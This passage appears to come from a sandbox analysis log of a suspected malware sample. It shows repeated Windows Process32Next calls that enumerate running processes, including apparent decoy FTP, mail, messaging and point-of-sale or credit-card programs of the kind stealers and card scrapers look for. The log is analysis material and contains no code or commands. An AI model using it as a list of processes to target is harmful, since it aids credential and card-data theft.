cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.347] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.349] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.351] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.354] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.437] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.439] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.442] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.444] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.447] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.449] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.452] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.454] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.457] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.461] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.463] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0294.466] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0294.468] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.471] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.474] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0294.476] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0294.479] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0294.519] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0294.521] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.523] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.526] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0294.528] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.530] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0294.533] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0294.536] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0294.539] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0294.541] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0294.543] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0294.545] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0294.546] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0294.548] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0294.550] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0294.552] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0294.553] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0294.555] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0294.556] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0294.753] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0294.755] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0294.756] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0294.758] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0294.760] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0294.765] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0294.767] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0294.769] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0294.771] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0294.772] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0294.774] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0294.775] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0294.780] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0294.782] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0294.784] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0294.786] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0294.788] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0294.790] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0294.815] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0294.817] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0294.819] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0294.821] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0294.826] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0294.829] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0294.831] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0294.833] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0294.834] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0294.836] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0294.838] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0294.874] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0294.877] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0294.879] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0294.882] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0294.884] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0294.986] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0294.988] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0294.991] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0294.994] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0294.999] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0295.002] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0295.004] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0295.007] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0295.009] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0295.015] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 